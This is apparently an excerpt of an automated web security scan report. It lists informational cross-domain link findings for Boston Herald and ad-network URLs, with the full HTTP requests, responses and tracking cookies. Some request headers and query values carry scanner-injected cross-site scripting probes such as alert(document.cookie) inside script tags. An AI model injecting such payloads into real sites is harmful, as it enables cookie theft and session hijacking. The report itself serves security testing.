http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294?
Content-Length: 598
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294?">here</a>
...[SNIP]...

17.247. http://pixel.invitemedia.com/rubicon_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/rubicon_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

The response contains the following link to another domain:

http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1296658125

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; dp_rec="{\"3\": 1296072684+ \"2\": 1295634039}"; segments="3391|3392|11262|11265|17277|38781|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 28 Jan 2011 14:48:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Fri, 28-Jan-2011 14:48:25 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 221

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1296658125"/></body>
...[SNIP]...

17.248. http://pixel.invitemedia.com/rubicon_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/rubicon_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

The response contains the following link to another domain:

http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1296665975

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; dp_rec="{\"3\": 1296072684+ \"2\": 1295634039}"; segments="3391|3392|11262|11265|17277|38781|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 28 Jan 2011 16:59:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Fri, 28-Jan-2011 16:59:15 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 221

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1296665975"/></body>
...[SNIP]...

17.249. http://scores.heraldinteractive.com/merge/tsnform.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scores.heraldinteractive.com
Path:	/merge/tsnform.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=

The response contains the following links to other domains:

http://bostonherald.newspaperdirect.com/
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@x01!x01
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://www.bostonherald.com/
http://www.bostonherald.com/about/contact/
http://www.bostonherald.com/about/contact/news_tip.bg
http://www.bostonherald.com/about/home_delivery/
http://www.bostonherald.com/blogs/
http://www.bostonherald.com/blogs/entertainment/
http://www.bostonherald.com/blogs/news/
http://www.bostonherald.com/blogs/sports/
http://www.bostonherald.com/business/
http://www.bostonherald.com/business/automotive/
http://www.bostonherald.com/business/general/
http://www.bostonherald.com/business/healthcare/
http://www.bostonherald.com/business/media/
http://www.bostonherald.com/business/real_estate/
http://www.bostonherald.com/business/technology/
http://www.bostonherald.com/business/womens/
http://www.bostonherald.com/crossword/
http://www.bostonherald.com/entertainment/
http://www.bostonherald.com/entertainment/arts_culture/
http://www.bostonherald.com/entertainment/books/
http://www.bostonherald.com/entertainment/fashion/
http://www.bostonherald.com/entertainment/food_dining/
http://www.bostonherald.com/entertainment/health/
http://www.bostonherald.com/entertainment/lifestyle/
http://www.bostonherald.com/entertainment/movies/
http://www.bostonherald.com/entertainment/music/
http://www.bostonherald.com/entertainment/television/
http://www.bostonherald.com/entertainment/travel/
http://www.bostonherald.com/homepage.bg
http://www.bostonherald.com/jobfind/
http://www.bostonherald.com/lottery
http://www.bostonherald.com/mediacenter
http://www.bostonherald.com/mediacenter/browser/
http://www.bostonherald.com/mediacenter/history/
http://www.bostonherald.com/mediakit/online/
http://www.bostonherald.com/mediakit/print/
http://www.bostonherald.com/news/
http://www.bostonherald.com/news/columnists/
http://www.bostonherald.com/news/international/
http://www.bostonherald.com/news/national/
http://www.bostonherald.com/news/obituaries/
http://www.bostonherald.com/news/offbeat/
http://www.bostonherald.com/news/opinion/
http://www.bostonherald.com/news/politics/
http://www.bostonherald.com/news/regional/
http://www.bostonherald.com/news/us_politics/
http://www.bostonherald.com/sports/
http://www.bostonherald.com/sports/baseball/
http://www.bostonherald.com/sports/basketball/
http://www.bostonherald.com/sports/college/
http://www.bostonherald.com/sports/columnists/
http://www.bostonherald.com/sports/football/
http://www.bostonherald.com/sports/golf/
http://www.bostonherald.com/sports/high_school/
http://www.bostonherald.com/sports/hockey/
http://www.bostonherald.com/sports/other_sports/
http://www.bostonherald.com/sports/soccer/
http://www.bostonherald.com/track/
http://www.bostonherald.com/track/celebrity/
http://www.bostonherald.com/track/inside_track/
http://www.bostonherald.com/track/star_tracks/
http://www.bostonherald.com/wireless
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.sportsnetwork.com/
http://www.uclick.com/client/boh/sudoc/

Request

GET /merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season= HTTP/1.1
Host: scores.heraldinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 05:21:36 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q0fm5255ct1r00ncq153f045; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Sports - BostonHerald.c
...[SNIP]...
</style>

<link rel="alternate" title="Sports - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/sports/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<div id="headerLogo">
<a href="http://www.bostonherald.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90">
...[SNIP]...
<div id="home" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/"><a href="http://www.bostonherald.com/homepage.bg">Home</a>
...[SNIP]...
<div id="news" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/news/">News & Opinion</a>
...[SNIP]...
<div id="sports" class="tabSelected"><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<div id="entertainment" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<div id="business" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<div id="inside" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<div id="blogs" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<div id="media" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/mediacenter">Photos & Media</a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.carfind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind">
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.homefind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind">
...[SNIP]...
div id="jobfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind">
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/baseball/">Red Sox & MLB</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/football/">Patriots & NFL</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/basketball/">Celtics & NBA</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/hockey/">Bruins & NHL</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/college/">College</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/columnists/">Columnists</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/soccer/">Revolution & Soccer</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/golf/">Golf</a>

</li>
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/high_school/">High School</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.bostonherald.com/sports/other_sports/">Other</a>
...[SNIP]...
<p class="tsnid">Powered by <a href="http://www.sportsnetwork.com" target="_blank">The Sports Network</A>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/blogs/sports/">Sports Blogs</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/blogs/news/">News & Business Blogs</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/blogs/entertainment/">Entertainment Blogs</a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/news/">News & Opinion</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/regional/">Local Coverage</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/politics/">Local Politics</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/columnists/">Columnists</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/opinion/">Opinion</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/national/">National</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/us_politics/">U.S. Politics</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/international/">International</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/offbeat/">Offbeat News</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/news/obituaries/">Obituaries </a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/baseball/">Red Sox & MLB</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/football/">Patriots & NFL</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/basketball/">Celtics & NBA</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/hockey/">Bruins & NHL</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/college/">College</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/soccer/">Revolution & Soccer</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/golf/">Golf</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/columnists/">Columnists</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/high_school/">High School</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/sports/other_sports/">Other</a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/arts_culture/">Arts & Culture</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/movies/">Movies</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/music/">Music</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/food_dining/">Food & Dining</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/health/">Health & Fitness</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/travel/">Travel</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/lifestyle/">Lifestyle</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/fashion/">Style & Fashion</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/television/">Television</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/entertainment/books/">Books</a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/track/inside_track/">The Inside Track</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/track/star_tracks/">Star Tracks</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/track/celebrity/">Celebrity News</a>
...[SNIP]...
<h1><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/general/">Business & Markets</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/real_estate/">Real Estate</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/media/">Media & Marketing</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/technology/">Technology</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/healthcare/">Healthcare</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/automotive/">Automotive</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/business/womens/">Women´s Business</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/jobfind/">Jobfind</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/jobfind/">Personals</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/crossword/">Crossword</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.bostonherald.com/lottery">Lottery Results</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target=_new">Play Sudoku!</a>
...[SNIP]...
</div>

<a class="orange" href="http://www.bostonherald.com/about/contact/">Contact us</a>  |  
<a class="orange" href="http://www.bostonherald.com/mediakit/print/">Print advertising</a>  |  
<a class="orange" href="http://www.bostonherald.com/mediakit/online/">Online advertising</a>  |  

<a class="orange" href="http://www.bostonherald.com/mediacenter/history/">Herald history</a>  |  
<a class="orange" href="http://www.bostonherald.com/about/contact/news_tip.bg">Send a news tip</a>  |  
<a class="orange" href="http://bostonherald.newspaperdirect.com" target="_new">Electronic edition</a>  |  
<a class="orange" href="http://www.bostonherald.com/mediacenter/browser/">Browser upgrade</a>  |  
<a class="orange" href="http://www.bostonherald.com/about/home_delivery/">Home delivery</a>  |  

<a class="orange" href="http://www.bostonherald.com/wireless">Mobile Edition</a>
...[SNIP]...
<br/>
No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</div>

<script language="JavaScript1.1" src="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@x01!x01"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.250. http://smm.sitescout.com/disp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smm.sitescout.com
Path:	/disp

Issue detail

The page was loaded from a URL containing a query string:

http://smm.sitescout.com/disp?pid=79C8ECB&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C1220000101%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D69%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3Bp%3D6%3Bf%3D990638%3Bh%3D922865%3Bk%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63722%2F0%2Fcj%2FV127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016%2F&rand=85624985

The response contains the following link to another domain:

http://smm.sitescout.netdna-cdn.com/300x250_lady31-1837a12.gif

Request

GET /disp?pid=79C8ECB&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C1220000101%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D69%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3Bp%3D6%3Bf%3D990638%3Bh%3D922865%3Bk%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63722%2F0%2Fcj%2FV127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016%2F&rand=85624985 HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

17.251. http://smm.sitescout.com/disp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smm.sitescout.com
Path:	/disp

Issue detail

The page was loaded from a URL containing a query string:

http://smm.sitescout.com/disp?pid=52AF2E4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D882519%3Bx%3D3584%3Bg%3D172%3Bc%3D1220000167%2C1220000167%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D126%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3Bp%3D6%3Bf%3D1075159%3Bh%3D922865%3Bk%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63723%2F0%2Fcj%2FV12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E%2F&rand=54969238

The response contains the following link to another domain:

http://smm.sitescout.netdna-cdn.com/local-728-2-e6c798f.gif

Request

GET /disp?pid=52AF2E4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D882519%3Bx%3D3584%3Bg%3D172%3Bc%3D1220000167%2C1220000167%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D126%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3Bp%3D6%3Bf%3D1075159%3Bh%3D922865%3Bk%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63723%2F0%2Fcj%2FV12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E%2F&rand=54969238 HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

17.252. http://tag.contextweb.com/TAGPUBLISH/getad.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TAGPUBLISH/getad.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://tag.contextweb.com/TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=8&c2=2102&c3=0&c4=&c5=&c6=&c15=&c16=TOT09%2cRCQU1%2cRCQU9&cv=2.0&cj=1
http://d.xp1.ru4.com/activity?_o=62795&_t=cm_cntxtweb
http://idpix.media6degrees.com/orbserv/hbpix?pixId=5392
http://map.pulsemgr.com/uds/pc?ptnr=21272
http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.,513102,,,TOT09,RCQU1,RCQU9,300X250
http://sync.mathtag.com/sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D
http://tags.bluekai.com/site/3358?id=gFEcJzqCjXJj

Request

